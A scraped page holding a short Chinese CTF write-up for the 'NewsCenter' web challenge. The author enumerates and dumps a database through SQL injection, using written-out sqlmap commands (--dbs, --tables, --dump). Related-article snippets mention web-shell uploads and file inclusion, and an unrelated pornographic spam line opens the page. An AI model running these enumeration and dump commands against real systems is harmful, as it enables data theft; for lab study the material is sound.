国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

攻防世界-WEB-NewsCenter

這篇具有很好參考價值的文章主要介紹了攻防世界-WEB-NewsCenter。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

打開環(huán)境

攻防世界-WEB-NewsCenter,CTF練習(xí)冊,數(shù)據(jù)庫,改行學(xué)it

有查詢,猜測是sql注入

攻防世界-WEB-NewsCenter,CTF練習(xí)冊,數(shù)據(jù)庫,改行學(xué)it

保存請求頭到文件中

攻防世界-WEB-NewsCenter,CTF練習(xí)冊,數(shù)據(jù)庫,改行學(xué)it

準備利用sqlmap

查找數(shù)據(jù)庫

python sqlmap.py -r ./123.txt --dbs

攻防世界-WEB-NewsCenter,CTF練習(xí)冊,數(shù)據(jù)庫,改行學(xué)it

查找表

python sqlmap.py -r ./123.txt --tables -D news

攻防世界-WEB-NewsCenter,CTF練習(xí)冊,數(shù)據(jù)庫,改行學(xué)it

查找字段

python sqlmap.py -r ./123.txt --column -D news -T secret_table

攻防世界-WEB-NewsCenter,CTF練習(xí)冊,數(shù)據(jù)庫,改行學(xué)it

顯示字段信息

python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g

攻防世界-WEB-NewsCenter,CTF練習(xí)冊,數(shù)據(jù)庫,改行學(xué)it

得到flag

QCTF{sq1_inJec7ion_ezzz文章來源地址http://www.zghlxwxcb.cn/news/detail-700277.html

到了這里,關(guān)于攻防世界-WEB-NewsCenter的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 攻防世界WEB練習(xí)區(qū)(backup、cookie、disabled_button)

    攻防世界WEB練習(xí)區(qū)(backup、cookie、disabled_button)

    前言 作者簡介:不知名白帽,網(wǎng)絡(luò)安全學(xué)習(xí)者。 博客主頁:https://blog.csdn.net/m0_63127854?type=blog 攻防世界專欄:https://blog.csdn.net/m0_63127854/category_11983747.html 網(wǎng)絡(luò)安全交流社區(qū):https://bbs.csdn.net/forums/angluoanquan 目錄 backup 題目介紹 題目思路 訪問靶場 常見備份文件后綴名 訪問ind

    2024年01月19日
    瀏覽(14)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 Web_php_include 解題詳析(php偽協(xié)議、data偽協(xié)議、file偽協(xié)議)

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 Web_php_include 解題詳析(php偽協(xié)議、data偽協(xié)議、file偽協(xié)議)

    這段代碼首先通過 show_source(__FILE__) 顯示當(dāng)前文件的源代碼,然后通過 $_GET[\\\'hello\\\'] 顯示 URL 參數(shù)中名為 hello 的值。 接下來,代碼使用 $_GET[\\\'page\\\'] 獲取 URL 參數(shù)中名為 “page” 的值,并進行字符串替換,將 php:// 替換為空字符串 這是為了防止通過 URL 參數(shù)加載本地文件或其他可

    2024年02月08日
    瀏覽(28)
  • 攻防世界ctf題目easyupload做題筆記。

    攻防世界ctf題目easyupload做題筆記。

    剛刷完upload-labs靶場,做做ctf題目,發(fā)現(xiàn)自己掌握的知識并不牢固。做了半天沒有解出來,最后還是看別人的題解做出來的。寫下做題過程,也就是wp吧。為了方便以后復(fù)習(xí)鞏固。 本題的主要考點為利用fastcgi的.user.ini特性進行任意命令執(zhí)行 這里需要繞過的點如下 檢查文件內(nèi)

    2024年02月01日
    瀏覽(19)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 backup 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 backup 解題詳析

    題目描述:X老師忘記刪除備份文件,他派小寧同學(xué)去把備份文件找出來,一起來幫小寧同學(xué)吧! PHP 腳本文件的備份文件名,通常采用以下命名方式: 在原始文件名后添加日期時間戳。例如,如果要備份名為 index.php 的文件,則可以將其備份文件命名為 index_20230521_004017.php。這

    2024年02月05日
    瀏覽(17)
  • [CTF/網(wǎng)絡(luò)安全]攻防世界 easyupload 解題詳析

    [CTF/網(wǎng)絡(luò)安全]攻防世界 easyupload 解題詳析

    題目描述:一名合格的黑客眼中,所有的上傳點都是開發(fā)者留下的后門 慣例,上傳一句話木馬 回顯如下: 也就是說文件被過濾 抓包改后綴,.php1~.php9、.htaccess均被過濾(.htaccess 文件是一個用于配置 Apache Web 服務(wù)器的配置文件。它通常位于網(wǎng)站根目錄或特定目錄中,用來為該

    2024年02月08日
    瀏覽(14)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 cookie 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 cookie 解題詳析

    題目描述:X老師告訴小寧他在cookie里放了些東西,小寧疑惑地想:這是夾心餅干的意思嗎? 根據(jù)提示,獲取頁面Cookie中的數(shù)據(jù)即可 頁面提示 look here:cookie.php ,于是GET /cookie.php : 提示 查看HTTP響應(yīng) method 1 HTTP響應(yīng)通常可以在瀏覽器的開發(fā)者工具中找到。 按下F12鍵打開瀏覽器

    2024年02月05日
    瀏覽(22)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 PHP2 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 PHP2 解題詳析

    翻譯: 你能給這個網(wǎng)站進行身份驗證嗎? index.php是一個常見的文件名,通常用于Web服務(wù)器中的網(wǎng)站根目錄下。它是默認的主頁文件名,在訪問一個網(wǎng)站時,如果沒有特別指定頁面文件名,則服務(wù)器會自動加載index.php文件。 在Web應(yīng)用程序中,index.php文件通常是網(wǎng)站的入口文件

    2024年02月13日
    瀏覽(27)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 wife_wife 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 wife_wife 解題詳析

    該題涉及Java Script原型鏈污染:JavaScript 原型鏈污染講解 可以看到,后端編程語言為Node.js, 簡單來講,通過 newUser.__proto__ 可以訪問到新對象的原型 未污染時: 污染時: 我們以知識點的利用為主,查看源代碼: 若isAdmin的屬性是true,則它為管理員,否則為普通用戶;于是我

    2024年02月06日
    瀏覽(68)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 view_source 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 view_source 解題詳析

    題目描述:X老師讓小寧同學(xué)查看一個網(wǎng)頁的源代碼,但小寧同學(xué)發(fā)現(xiàn)鼠標右鍵好像不管用了。 單擊鼠標右鍵,點擊查看頁面源代碼: 使用瀏覽器菜單:不同的瀏覽器可能會在不同的位置提供查看頁面源代碼的選項。 以Firefox為例,打開應(yīng)用程序菜單即可: 使用快捷鍵:幾乎

    2024年02月13日
    瀏覽(27)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 fileinclude 解題詳析(php偽協(xié)議)

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 fileinclude 解題詳析(php偽協(xié)議)

    由于index.php在/var/www/html目錄下,而flag.php與index.php同為php文件,故猜想flag.php也在該目錄下。 查看頁面源代碼獲取更多信息: 源代碼中看到 @include($lan.\\\".php\\\"); ,即此處存在文件包含。 又因為 $lan = $_COOKIE[\\\'language\\\']; 因此解題思路為:利用php偽協(xié)議,構(gòu)造language參數(shù),來讀取該目

    2024年02月07日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包